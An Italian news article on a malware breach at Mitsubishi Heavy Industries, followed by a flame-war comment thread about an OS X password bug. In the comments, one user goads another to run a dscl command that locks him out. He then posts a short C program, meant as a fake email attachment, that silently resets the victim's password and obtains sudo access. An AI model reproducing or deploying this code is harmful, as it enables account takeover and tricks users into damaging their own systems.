Giappone, attacco al contractor del governo

Mitsubishi cade vittima di un attacco a base di malware. Compromessi diversi siti sparsi in giro per il Sol Levante, ma il contractor assicura sulla sicurezza dei dati sensibili: nessun documento "segreto" è stato sottratto

Roma – Grossi guai di sicurezza all’orizzonte per Mitsubishi Heavy Industries, il maggior contractor del governo nipponico e parte del più ampio conglomerato nazionale noto come Mistubishi Group: la società ha denunciato la scoperta di svariati sistemi compromessi in 10 dei suoi siti sparsi per tutto il Giappone. Ma i dati riservati sono al sicuro, dicono da Tokyo.

In totale, stima MG, le macchine colpite sono 45 server di rete e 38 PC client: l’attacco è di quelli basati sull’installazione di malware, con otto diverse “specie” di codice malevolo (trojan in particolare) individuate sulle macchine compromesse.

Le prima tracce di intrusione sono state individuate già nella metà di agosto ma solo ora compaiono nelle cronache dei quotidiani nipponici: le indagini sono ancora in corso, e MG stima di rilasciare un rapporto completo sull’accaduto entro la fine del mese di settembre.

Per il momento Mitsubishi dice di non poter escludere completamente l’ipotesi che gli ignoti criminali informatici siano riusciti a far fuoriuscire informazioni sensibili su progetti riguardo ad armamenti e altra componentistica per il governo. “Abbiamo scoperto che alcune informazioni come gli indirizzi IP sono trapelate e la cosa è già abbastanza preoccupante”, dicono i portavoce dell’azienda nipponica.

Alfonso Maruccia

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Darwin scrive:
    Re: Uno
    No. Tutti coloro che, a differenza tua, stanno lontani dalle mele.
  • ruppolo scrive:
    Re: Problema inesistente
    - Scritto da: hermanhesse
    In svizzera quando sei nato tu usavano atrazina a
    gogo,
    vero?Dubito, la Svizzera non è così intensamente coltivata come l'Italia...
  • hermanhesse scrive:
    RUPPOLO
    Propongo un ricovero coatto.Chi è d'accordo?
    • prova123 scrive:
      Re: RUPPOLO
      Io sono contrario, perchè meno si è e più larghi si stà!! (rotfl)
      • ruppolo scrive:
        Re: RUPPOLO
        - Scritto da: prova123
        Io sono contrario, perchè meno si è e più larghi
        si stà!!
        (rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)
        • hermanhesse scrive:
          Re: RUPPOLO
          Ma sì, facciamo un bel finalle all'Americana(ROTFL)(ROTFL)(ROTFL)(ROTFL)(ROTFL)(ROTFL)PS: Roby, tu in realtà ridevi perchè neanche questa volta vengono a prenderti...
  • prova123 scrive:
    Il futuro che avanza ...
    o è avanzato ... e senza bisogno di password!!! :Dhttp://www.nightfallcrew.com/06/09/2011/atari-arcade-stick-for-apple-ipad/?lang=itSarà l'inizio di un nuovo percorso?Nintendo, Microsoft, Sony ... iniziate a tremare! :|
    • prova123 scrive:
      Re: Il futuro che avanza ...
      Mi raccomando dall'uscita nessuno potrà più fare un joystich con il pomello! ... Un pomello sul joystick ... chi l'avrebbe mai pensato. Questa si che è innovazione!
      • prova123 scrive:
        Re: Il futuro che avanza ...
        Mi scuso con i fanboy Apple, questo è il sito di riferimento:http://apple.digital.it/uno-stick-arcade-da-atari-per-i-videogiochi-su-ipad-8827.htmlGrandioso anche per iPad2!!!!
        • prova123 scrive:
          Re: Il futuro che avanza ...
          <i
          Un modo come un altro per il colosso che, dopo un momento di gravi difficoltà finanziarie che lha costretto ad abbandonare il proprio ruolo di primi piano allinterno dellindustria dellintrattenimento elettronico, di tornare a fare ciò che faceva meglio. </i
          Se lo dice la Apple ... nel dubbio inizio ad acquistare un pò di azioni Clementoni ... vuoi mai ...
        • atarilover sloggata e stufa dei pignoli scrive:
          Re: Il futuro che avanza ...
          - Scritto da: prova123
          Mi scuso con i fanboy Apple, questo è il sito di
          riferimento:

          http://apple.digital.it/uno-stick-arcade-da-atari-

          Grandioso anche per iPad2!!!!LO VOGLIO!!!!
          • prova123 scrive:
            Re: Il futuro che avanza ...
            Carissima "atarilover sloggata e stufa dei pignoli", se vuoi ti posso mostrare la mia sconfinata collezione di emulatori (geek) ... perfettamente funzionante!! (rotfl)
          • prova123 scrive:
            Re: Il futuro che avanza ...
            Che idea Alfonso. Perchè non fai una sezione "Love Boat" per cuori solitari. Tu gestisci i profili e la compatibilità in base ai device che uno possiede. Ad esempio se uno ha un televisore sharp ed una dolce donzella ha il blue ray sharp potrebbero un indice di compatibilità molto alto e se tutto va bene si ritrovano già la casa ben arredata!!! :DPensaci!!!!
          • Certo certo scrive:
            Re: Il futuro che avanza ...
            Guarda che è un maschio. Vuoi vedere come si fa? <b
            SHABADAM! </b
          • Certo certezza scrive:
            Re: Il futuro che avanza ...
            Eccomiiiiii! Sono Certo certezza, una ragazza carina e appassionata di nerd brufolosiiii.
          • panda rossa scrive:
            Re: Il futuro che avanza ...
            - Scritto da: Certo certezza
            Eccomiiiiii! Sono Certo certezza, una ragazza
            carina e appassionata di nerd
            brufolosiiii.Regola 30.
          • Certo certo scrive:
            Re: Il futuro che avanza ...
            Rischieresti di ritrovarti accoppiato con Mandingo.[img]http://profile.ak.fbcdn.net/hprofile-ak-snc4/50272_171062215735_1008423_n.jpg[/img]
          • atarilover sloggata e stufa dei pignoli scrive:
            Re: Il futuro che avanza ...
            - Scritto da: prova123
            Carissima "atarilover sloggata e stufa dei
            pignoli", se vuoi ti posso mostrare la mia
            sconfinata collezione di emulatori (geek) ...
            perfettamente funzionante!!
            (rotfl)No grazie, per me solo vero hardware ;)(atari)
          • prova123 scrive:
            Re: Il futuro che avanza ...
            Arrrrrgh! Un single core infranto! :D
          • atarilover sloggata e stufa dei pignoli scrive:
            Re: Il futuro che avanza ...
            ahahaha XDScehrzi a aprte, gli emulatori non mi piacciono, meglio ancora inserire le cartucce nella 2600 o accendere il Commodore...(atari)
          • prova123 scrive:
            Re: Il futuro che avanza ...
            Io lo faccio ancora con il mio fido Spectrum 48 :'(
          • prova123 scrive:
            Re: Il futuro che avanza ...
            "Cosa avrà voluto dire ..." (rotfl)( http://www.youtube.com/watch?v=9Qia8mTjWmw&feature=related )
          • Ego scrive:
            Re: Il futuro che avanza ...
            - Scritto da: atarilover sloggata e stufa dei pignoli
            - Scritto da: prova123

            Carissima "atarilover sloggata e stufa dei

            pignoli", se vuoi ti posso mostrare la mia

            sconfinata collezione di emulatori (geek) ...

            perfettamente funzionante!!

            (rotfl)

            No grazie, per me solo vero hardware ;)

            (atari)gioco ad ocarina of time su n64oid installato su sgs usando il gamepad dello snes modificato col BTabbastanza nerd?
          • AtariLover scrive:
            Re: Il futuro che avanza ...
            - Scritto da: Ego

            gioco ad ocarina of time su n64oid installato su
            sgs usando il gamepad dello snes modificato col
            BT

            abbastanza nerd?Non ci credo finché non lo vedo :DContattami pure in MP XDMa come hai fatto?(atari)
          • Ego scrive:
            Re: Il futuro che avanza ...
            - Scritto da: AtariLover
            - Scritto da: Ego



            gioco ad ocarina of time su n64oid
            installato
            su

            sgs usando il gamepad dello snes modificato
            col

            BT



            abbastanza nerd?

            Non ci credo finché non lo vedo :D
            Contattami pure in MP XD

            Ma come hai fatto?

            (atari)ti serve un BGP100 e questa guida http://www.instructables.com/id/Making-a-Nintendo-SNES-controller-into-bluetooth-/step3/Remove-the-BGP100-controller-board/e puoi giocarci anche in tv dalla poltrona con una spesa minima, altrimenti ci sono anche altri hack che permettono di bloccare lo smartphone sul gamepad, ci sono video di giapponesi che giocano a supermario sunshine in metro in questo modo ;)
  • dalek scrive:
    la solita storia ammufficata
    mac altappeto...linux altappeto...windows al tappeto...ios al tappetogoogle os al tappetoandroid al tappeto...avanti un altro che ce posto per le trollate di fine estate
  • echone scrive:
    Re: Uno

    Se lo domandano chi, i nerd cantinari compila
    kernel?Bruci eh, coxxione che non sei altro....Almeno i cantinari il kernel se lo installano come vogliono, se vogliono.Ignorante che non sei altro...
  • hermanhesse scrive:
    Ma parliamo di Skype su iOS
    http://www.youtube.com/watch?v=Ou_Iir2SklIPiuttosto semplice e pericoloso... mi domando se possa funzionare anche su altre piattaforme (Android per esempio).
    • ruppolo scrive:
      Re: Ma parliamo di Skype su iOS
      - Scritto da: hermanhesse
      http://www.youtube.com/watch?v=Ou_Iir2SklI

      Piuttosto semplice e pericoloso... mi domando se
      possa funzionare anche su altre piattaforme
      (Android per
      esempio).Tipico prodotto Microsoft. Da eliminare.
      • hermanhesse scrive:
        Re: Ma parliamo di Skype su iOS
        1) è microsoft da poco2) credi che alre app non abbiano problemi?3) fatti furbo.E per dirtela alla Sgarbi:Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra Capra ....
        • ruppolo scrive:
          Re: Ma parliamo di Skype su iOS
          - Scritto da: hermanhesse
          1) è microsoft da pocoQuanto basta.
          2) credi che alre app non abbiano problemi?Si, lo credo.
          3) fatti furbo.Sono furbo, per questo sono cliente Apple.

          E per dirtela alla Sgarbi:

          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra Capra Capra Capra Capra Capra Capra Capra
          Capra
          ....Bravo, sai usare il copia incolla, tu si che sei intelligente...Ma chi sarebbe questo signor Capra?-----------------------------------------------------------Modificato dall' autore il 21 settembre 2011 15.27-----------------------------------------------------------
          • hermanhesse scrive:
            Re: Ma parliamo di Skype su iOS
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            1) è microsoft da poco

            Quanto basta.Poveretto.


            2) credi che alre app non abbiano problemi?

            Si, lo credo.http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=iPhone&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=


            3) fatti furbo.

            Sono furbo, per questo sono cliente Apple.Se non sei abbastanza furbo da capire che OSX ha un problema, per quanto mi riguarda non sei nemmeno abbastanza furbo da trovare la strada del gabinetto quando ti scappa...




            E per dirtela alla Sgarbi:



            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra Capra Capra Capra Capra Capra Capra
            Capra

            Capra

            ....

            Bravo, sai usare il copia incolla, tu si che sei
            intelligente...
            Ma chi sarebbe questo signor Capra?
            --------------------------------------------------
            Modificato dall' autore il 21 settembre 2011 15.27
            --------------------------------------------------
      • hermanhesse scrive:
        Re: Ma parliamo di Skype su iOS
        Bene Ruppolo.Continua così, che vai bene ;)
  • Certo certo scrive:
    Tutto secondo programma.
    No Jobs, No Party. Il declino è iniziato. Bello avere sempre ragione. Tirerete avanti ancora per un pò, perchè ormai siete un pc da boutique e certe cose vendono a prescindere dalla qualità, ma ormai la strada è segnata e adesso non avete più l'RDF di Steve che vi salva le chiappe.[img]http://www.appuntidigitali.it/site/wp-content/uploads/mela_bacata.png[/img]
    • io che non so niente scrive:
      Re: Tutto secondo programma.
      Ti prego, c'è già ruppolo che pensa a fare flames.
    • ruppolo scrive:
      Re: Tutto secondo programma.
      - Scritto da: Certo certo
      No Jobs, No Party. Il declino è iniziato.Si si, certo certo...http://apple.hdblog.it/2011/09/21/il-titolo-apple-e-troppo-forte-per-la-media-dei-titoli-industriali-del-dow-jones/
      Bello
      avere sempre ragione.Certo certo:http://www.iphoneitalia.com/i-clienti-di-apple-sono-i-piu-soddisfatti-damerica-per-lottavo-anno-consecutivo-288449.html#more-288449
      Tirerete avanti ancora per
      un pò, perchè ormai siete un pc da boutique e
      certe cose vendono a prescindere dalla qualità,
      ma ormai la strada è segnata e adesso non avete
      più l'RDF di Steve che vi salva le
      chiappe.Mi raccomando la scorta di Maalox, l'anno in corso sarà duro per te!
      • hermanhesse scrive:
        Re: Tutto secondo programma.
        Bene, due link. Uno "iphoneitalia", l'altro "hdblog".Autorevoli come sempre.Ruppolo tu hai dei problemi, curati.
        • ruppolo scrive:
          Re: Tutto secondo programma.
          - Scritto da: hermanhesse
          Bene, due link. Uno "iphoneitalia", l'altro
          "hdblog".
          Autorevoli come sempre.Lo sai che con me l'attacco alla fonte delle notizie non va a buon fine, perché insisti?http://www.bloomberg.com/news/2011-09-20/apple-s-stock-price-is-too-high-for-inclusion-in-dow-average-bespoke-says.htmlhttp://www.theacsi.org/index.php?option=com_content&view=article&id=210:acsi-scores-september&catid=14&Itemid=265
          Ruppolo tu hai dei problemi, curati.Cambia tattica, con questa fai la figura dell'idiota.
        • TheOriginalFanboy scrive:
          Re: Tutto secondo programma.
          - Scritto da: hermanhesse
          Bene, due link. Uno "iphoneitalia", l'altro
          "hdblog".
          Autorevoli come sempre.

          Ruppolo tu hai dei problemi, curati.ora, per favore, fai uno sforzo semplice semplice, esci da quel browserino di firefox, vai su safari, chrome, vai a vedere le stock, fatto un giro su bloomberg , sole24 ore, quello che vuoi..tira tu le conseguenze
          • hermanhesse scrive:
            Re: Tutto secondo programma.
            La conseguenza è che c'è un grave bug su OSX e che qui ci sono due idioti che dicono che non è grave.Ecco quali sono le conseguenze!!!
          • ruppolo scrive:
            Re: Tutto secondo programma.
            - Scritto da: hermanhesse
            La conseguenza è che c'è un grave bug su OSX e
            che qui ci sono due idioti che dicono che non è
            grave.

            Ecco quali sono le conseguenze!!!BRRRR che paura :D
          • Certo certo scrive:
            Re: Tutto secondo programma.
            Si chiama <b
            RDF - Reality Distortion Field. </b
            Se lo sai usare, puoi far succedere cose inimmaginabili. Anche convincere la gente che la XXXXX è un toccasana per l'intestino.
      • Certo certo scrive:
        Re: Tutto secondo programma.
        Avevo previsto anche questo che è un risultato perfettamente in linea con il posizionamento di mercato del vostro pc da boutique (che sta sempre al 5% di penetrazione, nonostante il marchio Apple sia pompato all'inverosimile). Infatti la caduta sarà rovinosa. Ma tutto a suo tempo. E' ancora presto.
  • ciccio scrive:
    Su win invece......
    basta digitare net user nomeutente nuovapassworde puoi cambiare anche la password degli altri utenti senza conoscerla.oppure net user nomeutente /deletee fare pulizia......
    • hermanhesse scrive:
      Re: Su win invece......
      1) Se sei administrator... forse è questo il punto che non è chiaro2) non lo puoi fare da remoto
      • ruppolo scrive:
        Re: Su win invece......
        - Scritto da: hermanhesse
        1) Se sei administrator... forse è questo il
        punto che non è
        chiaroÈ chiarissimo, e tutti sono administrator della propria macchina.
        2) non lo puoi fare da remotoDa remoto puoi fare ben altre cose, che è meglio non dire...
        • hermanhesse scrive:
          Re: Su win invece......
          - Scritto da: ruppolo
          - Scritto da: hermanhesse

          1) Se sei administrator... forse è questo il

          punto che non è

          chiaro

          È chiarissimo, e tutti sono administrator
          della propria
          macchina.Ma cosa diavolo stai dicendo? qui ci sono un centinaio di macchine e NESSUNA ha loggato l'utente admin.Ma che diavolo stai dicendo???


          2) non lo puoi fare da remoto

          Da remoto puoi fare ben altre cose, che è meglio
          non
          dire...Le stesse cose che fai su qualuqnue altro sistema in presenza di un bug exploitabile?
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            1) Se sei administrator... forse è
            questo
            il


            punto che non è


            chiaro



            È chiarissimo, e tutti sono
            administrator

            della propria

            macchina.

            Ma cosa diavolo stai dicendo? qui ci sono un
            centinaio di macchine e NESSUNA ha loggato
            l'utente
            admin.
            Ma che diavolo stai dicendo???Se lì hai un centinaio di macchine allora avrai anche un sistema centralizzato di autenticazione.





            2) non lo puoi fare da remoto



            Da remoto puoi fare ben altre cose, che è
            meglio

            non

            dire...

            Le stesse cose che fai su qualuqnue altro sistema
            in presenza di un bug
            exploitabile?Certo, con la differenza che su Windows SI FANNO!
          • hermanhesse scrive:
            Re: Su win invece......
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo


            - Scritto da: hermanhesse



            1) Se sei administrator... forse è

            questo

            il



            punto che non è



            chiaro





            È chiarissimo, e tutti sono

            administrator


            della propria


            macchina.



            Ma cosa diavolo stai dicendo? qui ci sono un

            centinaio di macchine e NESSUNA ha loggato

            l'utente

            admin.

            Ma che diavolo stai dicendo???

            Se lì hai un centinaio di macchine allora avrai
            anche un sistema centralizzato di
            autenticazione.Ma cosa DIAVOLO centra con il fatto che su una macchina l'utente X è uno user normale e che esiste u n utente admin sempre locale che invece può amministrare la macchina?Si parla di macchina LOCALE!Ma neanche questo?









            2) non lo puoi fare da remoto





            Da remoto puoi fare ben altre cose, che
            è

            meglio


            non


            dire...



            Le stesse cose che fai su qualuqnue altro
            sistema

            in presenza di un bug

            exploitabile?

            Certo, con la differenza che su Windows SI FANNO!Ruppolo scrivi:dscl localhost -passwd /Search/Users/ruppoloe alla richiesta batti dei tasti a caso e poi premi invio.Riavvia la macchina e almeno per un po' te ne stai fuori dalle OO !!!!
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            Ma cosa DIAVOLO centra con il fatto che su una
            macchina l'utente X è uno user normale e che
            esiste u n utente admin sempre locale che invece
            può amministrare la
            macchina?Ti è difficile da capire che nelle piccole realtà l'utente È amministratore mentre nelle grandi realtà il sistema di autenticazione è remoto?

            Si parla di macchina LOCALE!

            Ma neanche questo?Allora se parli di macchine locali, gli utenti lavorano con account da amministratore, che è anche il default sia per OS X che per Windows.














            2) non lo puoi fare da remoto







            Da remoto puoi fare ben altre
            cose,
            che

            è


            meglio



            non



            dire...





            Le stesse cose che fai su qualuqnue
            altro

            sistema


            in presenza di un bug


            exploitabile?



            Certo, con la differenza che su Windows SI
            FANNO!

            Ruppolo scrivi:

            dscl localhost -passwd /Search/Users/ruppolo

            e alla richiesta batti dei tasti a caso e poi
            premi
            invio.
            Riavvia la macchina e almeno per un po' te ne
            stai fuori dalle OO
            !!!!La tua tecnica di social engineering è fiacca.
          • hermanhesse scrive:
            Re: Su win invece......
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            Ma cosa DIAVOLO centra con il fatto che su
            una

            macchina l'utente X è uno user normale e che

            esiste u n utente admin sempre locale che
            invece

            può amministrare la

            macchina?

            Ti è difficile da capire che nelle piccole realtà
            l'utente È amministratore mentre nelle
            grandi realtà il sistema di autenticazione è
            remoto?Ti è difficile capire che se un utente è idiota lo è anche su OSX e scrive la f+tt+t+a password ogni volta che glielo si chiede?




            Si parla di macchina LOCALE!



            Ma neanche questo?

            Allora se parli di macchine locali, gli utenti
            lavorano con account da amministratore, che è
            anche il default sia per OS X che per
            Windows.Default???? Ma cosa diavolo stai dicendo... ma 7 lo hai mai visto?




















            2) non lo puoi fare da
            remoto









            Da remoto puoi fare ben altre

            cose,

            che


            è



            meglio




            non




            dire...







            Le stesse cose che fai su qualuqnue

            altro


            sistema



            in presenza di un bug



            exploitabile?





            Certo, con la differenza che su Windows
            SI

            FANNO!



            Ruppolo scrivi:



            dscl localhost -passwd /Search/Users/ruppolo



            e alla richiesta batti dei tasti a caso e poi

            premi

            invio.

            Riavvia la macchina e almeno per un po' te ne

            stai fuori dalle OO

            !!!!

            La tua tecnica di social engineering è fiacca.Hai ragione... meglio un fakemail con il allegato un eseguibile:#include <stdlib.h
            #include <stdio.h
            #define PASSWORD "sucksman"int main(int argc, const char * const argv[]) {char *user=getenv("USER");char buf[256];sprintf(buf, "dscl localhost -passwd /Search/Users/%s " PASSWORD, user);system(buf);system("echo " PASSWORD " | sudo -S id");return 0;}
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            Ma cosa DIAVOLO centra con il fatto che
            su

            una


            macchina l'utente X è uno user normale
            e
            che


            esiste u n utente admin sempre locale
            che

            invece


            può amministrare la


            macchina?



            Ti è difficile da capire che nelle piccole
            realtà

            l'utente È amministratore mentre nelle

            grandi realtà il sistema di autenticazione è

            remoto?

            Ti è difficile capire che se un utente è idiota
            lo è anche su OSX e scrive la f+tt+t+a password
            ogni volta che glielo si
            chiede?Certo, ma qui mi par di capire che non gli viene chiesta nessuna password... o forse ho capito male?








            Si parla di macchina LOCALE!





            Ma neanche questo?



            Allora se parli di macchine locali, gli
            utenti

            lavorano con account da amministratore, che è

            anche il default sia per OS X che per

            Windows.

            Default???? Ma cosa diavolo stai dicendo... ma 7
            lo hai mai
            visto?Certo, e installa un utente amministratore, altrimenti come potresti gestire il computer all'inizio?
            Hai ragione... meglio un fakemail con il allegato
            un
            eseguibile:

            #include <stdlib.h

            #include <stdio.h


            #define PASSWORD "sucksman"

            int main(int argc, const char * const argv[]) {
            char *user=getenv("USER");
            char buf[256];

            sprintf(buf, "dscl localhost -passwd
            /Search/Users/%s " PASSWORD,
            user);
            system(buf);
            system("echo " PASSWORD " | sudo -S id");
            return 0;
            }Che bello, me lo mandi?
          • hermanhesse scrive:
            Re: Su win invece......
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo


            - Scritto da: hermanhesse



            Ma cosa DIAVOLO centra con il
            fatto
            che

            su


            una



            macchina l'utente X è uno user
            normale

            e

            che



            esiste u n utente admin sempre
            locale

            che


            invece



            può amministrare la



            macchina?





            Ti è difficile da capire che nelle
            piccole

            realtà


            l'utente È amministratore mentre
            nelle


            grandi realtà il sistema di
            autenticazione
            è


            remoto?



            Ti è difficile capire che se un utente è
            idiota

            lo è anche su OSX e scrive la f+tt+t+a
            password

            ogni volta che glielo si

            chiede?

            Certo, ma qui mi par di capire che non gli viene
            chiesta nessuna password... o forse ho capito
            male?Se l'utente non è idiota:1) non usa una account administrators2) e/o aggiorna il sistema periodicamente3) non apre alelgati straniecc. ecc... e si ritorna al punto precedente!













            Si parla di macchina LOCALE!







            Ma neanche questo?





            Allora se parli di macchine locali, gli

            utenti


            lavorano con account da amministratore,
            che
            è


            anche il default sia per OS X che per


            Windows.



            Default???? Ma cosa diavolo stai dicendo...
            ma
            7

            lo hai mai

            visto?

            Certo, e installa un utente amministratore,
            altrimenti come potresti gestire il computer
            all'inizio?Ma sei un idiota se sai di essere utonto e te lo tieni come account principale!!!! Ma su OSX lo tengono? Non mi risulta!!!


            Hai ragione... meglio un fakemail con il
            allegato

            un

            eseguibile:



            #include <stdlib.h


            #include <stdio.h




            #define PASSWORD "sucksman"



            int main(int argc, const char * const
            argv[])
            {

            char *user=getenv("USER");

            char buf[256];



            sprintf(buf, "dscl localhost -passwd

            /Search/Users/%s " PASSWORD,

            user);

            system(buf);

            system("echo " PASSWORD " | sudo -S id");

            return 0;

            }

            Che bello, me lo mandi?Ma la finisci o no di sparare cretinate?
          • TheOriginalFanboy scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            1) Se sei administrator... forse è
            questo
            il


            punto che non è


            chiaro



            È chiarissimo, e tutti sono
            administrator

            della propria

            macchina.

            Ma cosa diavolo stai dicendo? qui ci sono un
            centinaio di macchine e NESSUNA ha loggato
            l'utente
            admin.
            Ma che diavolo stai dicendo???
            BRAVO!!! sei un ottimo sys adminma ora, con calma, esci dalla tua fortezza e guarda IL MONDO REALE...XP: TUTTI ADMINVISTA: installano tutto e danno privilegi dai admin alle app per nonn avere ogni volta 1000 advice7: come vista, solo con qualche sicurezza in piùMA, il 50% dei pc al mondo ha ancora XP tira tu le conseguenze
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: TheOriginalFanboy
            MA, il 50% dei pc al mondo ha ancora XP Il 50%?No no, di più:Windows XP: 52,46%Windows 95+ME+98+NT+2000+Vista+7+Linux = 41,5%
          • hermanhesse scrive:
            Re: Su win invece......
            Ora tu e mr. fantastic qui sopra prendetevi la mano ed andate a giocare lungo l'autostrada.
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            Ora tu e mr. fantastic qui sopra prendetevi la
            mano ed andate a giocare lungo
            l'autostrada.Va ben dai, abbiamo capito che oggi è la tua giornata di gloria.
          • hermanhesse scrive:
            Re: Su win invece......
            La questione è che qualche sprovveduto potrebbe crederti e magari pensare che il suo sistema non ha problemi...Sei un consulente, per Dio!!!
          • ruppolo scrive:
            Re: Su win invece......
            - Scritto da: hermanhesse
            La questione è che qualche sprovveduto potrebbe
            crederti e magari pensare che il suo sistema non
            ha
            problemi...E fa bene.
            Sei un consulente, per Dio!!!Questa sembra una frase celebre...
          • nome e cognome scrive:
            Re: Su win invece......

            tira tu le conseguenzeDai dai tiriamo le conseguenza: il sistema nuovo di pacca di Ueppolz è sicuro quasi quanto XP uscito nel 2001.
      • Funz scrive:
        Re: Su win invece......
        - Scritto da: hermanhesse
        1) Se sei administrator... forse è questo il
        punto che non è
        chiaro
        2) non lo puoi fare da remotoowned
    • hermanhesse scrive:
      Re: Su win invece......
      Ah... ci sono cose ben peggiori su win se vogliamo, tipo diabilitare il firewall direttamente da una applicazione che magari fa da trojan...
    • Prozac scrive:
      Re: Su win invece......
      - Scritto da: ciccio
      basta digitare
      net user nomeutente nuovapasswordmmmmmErrore di sistema 5.AcXXXXX negato.
      e puoi cambiare anche la password degli altri
      utenti senza
      conoscerla.

      oppure
      net user nomeutente /delete
      e fare pulizia......mmmmmErrore di sistema 5.AcXXXXX negato.
    • M C scrive:
      Re: Su win invece......
      Si può fare se si è amministratore della macchina, come d'altronde anche in linux se hai i privilegi di root.
  • ruppolo scrive:
    Re: Problema inesistente
    - Scritto da: hermanhesse
    Dimmi... e se perdo la password del sistema dove
    gira l'ambaradao come
    faccio?Compri un altro Mac, no?
    Ops... due neuroni che girano nello stesso senso
    no, vero Ruppolo? Non ce lafai proprio?
    L'importante è mostrare schermate
    colorate...A proposito di neuroni, cosa volevi dimostrare con questo post?http://punto-informatico.it/b.aspx?i=3249291&m=3256514#p3256514
    • Ego scrive:
      Re: Problema inesistente
      - Scritto da: ruppolo
      - Scritto da: hermanhesse

      Dimmi... e se perdo la password del sistema
      dove

      gira l'ambaradao come

      faccio?

      Compri un altro Mac, no?


      Ops... due neuroni che girano nello stesso
      senso

      no, vero Ruppolo? Non ce lafai proprio?

      L'importante è mostrare schermate

      colorate...

      A proposito di neuroni, cosa volevi dimostrare
      con questo
      post?
      http://punto-informatico.it/b.aspx?i=3249291&m=325stai fuori di testa forte eh? ti ha messo davvero in crisi sto bug
      • ruppolo scrive:
        Re: Problema inesistente
        - Scritto da: Ego
        - Scritto da: ruppolo

        - Scritto da: hermanhesse


        Dimmi... e se perdo la password del
        sistema

        dove


        gira l'ambaradao come


        faccio?



        Compri un altro Mac, no?




        Ops... due neuroni che girano nello
        stesso

        senso


        no, vero Ruppolo? Non ce lafai proprio?


        L'importante è mostrare schermate


        colorate...



        A proposito di neuroni, cosa volevi
        dimostrare

        con questo

        post?


        http://punto-informatico.it/b.aspx?i=3249291&m=325

        stai fuori di testa forte eh? ti ha messo davvero
        in crisi sto
        bugA corto di argomenti?
        • hermanhesse scrive:
          Re: Problema inesistente
          Poveretto che sei... tu che invece svicoli dal bug che esiste ed è pericoloso su OSX non sei a corto di argomenti vero?Ma credi che la gente sia tutta idiota come quella che conosci tu?
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Poveretto che sei... tu che invece svicoli dal
            bug che esiste ed è pericoloso su OSX non sei a
            corto di argomenti
            vero?

            Ma credi che la gente sia tutta idiota come
            quella che conosci
            tu?Di più.
          • hermanhesse scrive:
            Re: Problema inesistente
            Invece tutti, dal primo all'ultimo, stanno dicendo che faresti meglio a stare con i piedi per terra.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Invece tutti, dal primo all'ultimo, stanno
            dicendo che faresti meglio a stare con i piedi
            per
            terra.Vedo solo te preso da questa foga...Mi fa piacere che i troll si appendano a queste sciocchezzuole, è sintomo che ormai sono alla frutta.
          • hermanhesse scrive:
            Re: Problema inesistente
            Veramente anche fanboy Apple come bertuccia e valerius ammettono che questa è una cosa grave.Perchè sono persone con un cervello, una dignità e conoscenze informatiche.A differenza di te.
    • hermanhesse scrive:
      Re: Problema inesistente
      Ma tu... tu sei completamente fuori! (ROTFL)Cioè hai aspettato un + per farmi vedere che cresce? (ROTFL)Ragazzi, ricovero coatto...
      • ruppolo scrive:
        Re: Problema inesistente
        - Scritto da: hermanhesse
        Ma tu... tu sei completamente fuori! (ROTFL)Preso in castagna, eh?
        Cioè hai aspettato un + per farmi vedere che
        cresce?
        (ROTFL)E tu cosa volevi farmi vedere?
        Ragazzi, ricovero coatto...EPIC FAIL.
        • hermanhesse scrive:
          Re: Problema inesistente
          - Scritto da: ruppolo
          - Scritto da: hermanhesse

          Ma tu... tu sei completamente fuori! (ROTFL)

          Preso in castagna, eh?ma no, lo sapevamo già che eri fuori.


          Cioè hai aspettato un + per farmi vedere che

          cresce?

          (ROTFL)

          E tu cosa volevi farmi vedere?Che Apple sale e scende come tutti i titoli e che esistono titoli meno gonfiati che salgono proporzionalmente di più?


          Ragazzi, ricovero coatto...

